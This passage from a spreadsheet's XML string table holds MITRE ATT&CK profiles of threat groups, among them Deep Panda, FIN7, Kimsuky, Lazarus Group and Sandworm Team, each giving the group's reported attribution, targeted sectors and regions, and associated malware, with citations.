    <t>[Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016)</t>
  </si>
  <si>
    <t>[DragonOK](https://attack.mitre.org/groups/G0017) is a threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, [DragonOK](https://attack.mitre.org/groups/G0017) is thought to have a direct or indirect relationship with the threat group [Moafee](https://attack.mitre.org/groups/G0002). (Citation: Operation Quantum Entanglement) It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT. (Citation: New DragonOK)</t>
  </si>
  <si>
    <t>[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)</t>
  </si>
  <si>
    <t>[EXOTIC LILY](https://attack.mitre.org/groups/G1011) is a financially motivated group that has been closely linked with [Wizard Spider](https://attack.mitre.org/groups/G0102) and the deployment of ransomware including [Conti](https://attack.mitre.org/software/S0575) and [Diavol](https://attack.mitre.org/software/S0659). [EXOTIC LILY](https://attack.mitre.org/groups/G1011) may be acting as an initial access broker for other malicious actors, and has targeted a wide range of industries including IT, cybersecurity, and healthcare since at least September 2021.(Citation: Google EXOTIC LILY March 2022)</t>
  </si>
  <si>
    <t>[Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t xml:space="preserve">[Ember Bear](https://attack.mitre.org/groups/G1003) is a suspected Russian state-sponsored cyber espionage group that has been active since at least March 2021. [Ember Bear](https://attack.mitre.org/groups/G1003) has primarily focused their operations against Ukraine and Georgia, but has also targeted Western European and North American foreign ministries, pharmaceutical companies, and financial sector organizations. Security researchers assess [Ember Bear](https://attack.mitre.org/groups/G1003) likely conducted the [WhisperGate](https://attack.mitre.org/software/S0689) destructive wiper attacks against Ukraine in early 2022.(Citation: CrowdStrike Ember Bear Profile March 2022)(Citation: Mandiant UNC2589 March 2022)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) </t>
  </si>
  <si>
    <t>[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>[Evilnum](https://attack.mitre.org/groups/G0120) is a financially motivated threat group that has been active since at least 2018.(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) is a financially-motivated threat group that has been active since 2013 primarily targeting the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. A portion of [FIN7](https://attack.mitre.org/groups/G0046) was run out of a front company called Combi Security. Since 2020 [FIN7](https://attack.mitre.org/groups/G0046) shifted operations to a big game hunting (BGH) approach including use of [REvil](https://attack.mitre.org/software/S0496) ransomware and their own Ransomware as a Service (RaaS), Darkside. [FIN7](https://attack.mitre.org/groups/G0046) may be linked to the [Carbanak](https://attack.mitre.org/groups/G0008) Group, but there appears to be several groups using [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately.(Citation: FireEye FIN7 March 2017)(Citation: FireEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) is a threat group that has primarily targeted Persian-speaking individuals in Iran since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) is threat actor with a suspected nexus to the Iranian government that has been active since at least 2017 against entities in the Middle East, North Africa, Europe, Australia, and North America. [Fox Kitten](https://attack.mitre.org/groups/G0117) has targeted multiple industrial verticals including oil and gas, technology, government, defense, healthcare, manufacturing, and engineering.(Citation: ClearkSky Fox Kitten February 2020)(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: Dragos PARISITE )(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>[GALLIUM](https://attack.mitre.org/groups/G0093) is a cyberespionage group that has been active since at least 2012, primarily targeting telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam. Security researchers have identified [GALLIUM](https://attack.mitre.org/groups/G0093) as a likely Chinese state-sponsored group, based in part on tools used and TTPs commonly associated with Chinese threat actors.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)(Citation: Unit 42 PingPull Jun 2022)</t>
  </si>
  <si>
    <t>[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)</t>
  </si>
  <si>
    <t>[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2019 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>[Gamaredon Group](https://attack.mitre.org/groups/G0047) is a suspected Russian cyber espionage threat group that has targeted military, NGO, judiciary, law enforcement, and non-profit organizations in Ukraine since at least 2013. The name [Gamaredon Group](https://attack.mitre.org/groups/G0047) comes from a misspelling of the word "Armageddon", which was detected in the adversary's early campaigns.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: Symantec Shuckworm January 2022)(Citation: Microsoft Actinium February 2022)
In November 2021, the Ukrainian government publicly attributed [Gamaredon Group](https://attack.mitre.org/groups/G0047) to Russia's Federal Security Service (FSB) Center 18.(Citation: Bleepingcomputer Gamardeon FSB November 2021)(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) is a cyber espionage threat group that has targeted oil &amp; gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. [HEXANE](https://attack.mitre.org/groups/G1001)'s TTPs appear similar to [APT33](https://attack.mitre.org/groups/G0064) and [OilRig](https://attack.mitre.org/groups/G0049) but due to differences in victims and tools it is tracked as a separate entity.(Citation: Dragos Hexane)(Citation: Kaspersky Lyceum October 2021)(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) is a cyber espionage group active since at least 2014. The group has targeted multiple industries and governmental entities primarily in Russia, but has also been active in the United States and throughout Europe, Asia, Africa, and the Middle East.(Citation: Unit 42 Inception November 2018)(Citation: Symantec Inception Framework March 2018)(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) is a Russia-based cybercriminal group that has been active since at least 2014. [Indrik Spider](https://attack.mitre.org/groups/G0119) initially started with the [Dridex](https://attack.mitre.org/software/S0384) banking Trojan, and then by 2017 they began running ransomware operations using [BitPaymer](https://attack.mitre.org/software/S0570), [WastedLocker](https://attack.mitre.org/software/S0612), and Hades ransomware.(Citation: Crowdstrike Indrik November 2018)(Citation: Crowdstrike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 2019)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted oil, government, diplomatic, military, and NGOs in Central and South America, the Caribbean, Europe, and North America since at least 2010.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: APT15 Intezer June 2018)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korea-based cyber espionage group that has been active since at least 2012. The group initially focused on targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, and expanded its operations to include the United States, Russia, Europe, and the UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: CISA AA20-301A Kimsuky)
[Kimsuky](https://attack.mitre.org/groups/G0094) was assessed to be responsible for the 2014 Korea Hydro &amp; Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Citation: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab Kimsuky Kabar Cobra Feb 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.</t>
  </si>
  <si>
    <t>[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).   </t>
  </si>
  <si>
    <t>[LazyScripter](https://attack.mitre.org/groups/G0140) is threat group that has mainly targeted the airlines industry since at least 2018, primarily using open-source toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) is a Chinese state-sponsored cyber espionage group that has been attributed to the Ministry of State Security's (MSS) Hainan State Security Department and an affiliated front company.(Citation: CISA AA21-200A APT40 July 2021) Active since at least 2009, [Leviathan](https://attack.mitre.org/groups/G0065) has targeted the following sectors: academia, aerospace/aviation, biomedical, defense industrial base, government, healthcare, manufacturing, maritime, and transportation across the US, Canada, Europe, the Middle East, and Southeast Asia.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.(Citation: FireEye APT35 2018)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)(Citation: Proofpoint TA453 July2021)</t>
  </si>
  <si>
    <t>[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103) is a likely China-based cyber espionage group, named for its frequent practice of imitating a victim's infrastructure. This adversary has been observed since at least May 2012 conducting focused attacks against government and critical infrastructure in Myanmar, as well as several other countries and sectors including military, automobile, and weapons industries.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) is an Arabic-speaking, politically-motivated threat group that has been operating since 2012. The group's victims have primarily been in the Middle East, Europe, and the United States.(Citation: DustySky)(Citation: DustySky2)(Citation: Kaspersky MoleRATs April 2019)(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) is a suspected Iranian threat group that has primarily targeted Israeli companies since at least September 2021. [Moses Staff](https://attack.mitre.org/groups/G1009) openly stated their motivation in attacking Israeli companies is to cause damage by leaking stolen sensitive data and encrypting the victim's networks without a ransom demand.(Citation: Checkpoint MosesStaff Nov 2021) 
Security researchers assess [Moses Staff](https://attack.mitre.org/groups/G1009) is politically motivated, and has targeted government, finance, travel, energy, manufacturing, and utility companies outside of Israel as well, including those in Italy, India, Germany, Chile, Turkey, the UAE, and the US.(Citation: Cybereason StrifeWater Feb 2022)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) </t>
  </si>
  <si>
    <t>[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[Naikon](https://attack.mitre.org/groups/G0019) is assessed to be a state-sponsored cyber espionage group attributed to the Chinese People’s Liberation Army’s (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020).(Citation: CameraShy) Active since at least 2010, [Naikon](https://attack.mitre.org/groups/G0019) has primarily conducted operations against government, military, and civil organizations in Southeast Asia, as well as against international bodies such as the United Nations Development Programme (UNDP) and the Association of Southeast Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baumgartner Naikon 2015) 
While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: Baumgartner Golovkin Naikon 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)</t>
  </si>
  <si>
    <t>[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage.(Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>[POLONIUM](https://attack.mitre.org/groups/G1005) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://attack.mitre.org/groups/G1005) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.(Citation: Microsoft POLONIUM June 2022)</t>
  </si>
  <si>
    <t>[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics.(Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)</t>
  </si>
  <si>
    <t>[Patchwork](https://attack.mitre.org/groups/G0040) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.(Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)</t>
  </si>
  <si>
    <t>[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)</t>
  </si>
  <si>
    <t>[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)</t>
  </si>
  <si>
    <t>[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>[Rocke](https://attack.mitre.org/groups/G0106) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://attack.mitre.org/groups/G0106) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://attack.mitre.org/groups/G0106) and the Iron Cybercrime Group, though this attribution has not been confirmed.(Citation: Talos Rocke August 2018)</t>
  </si>
  <si>
    <t>[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)
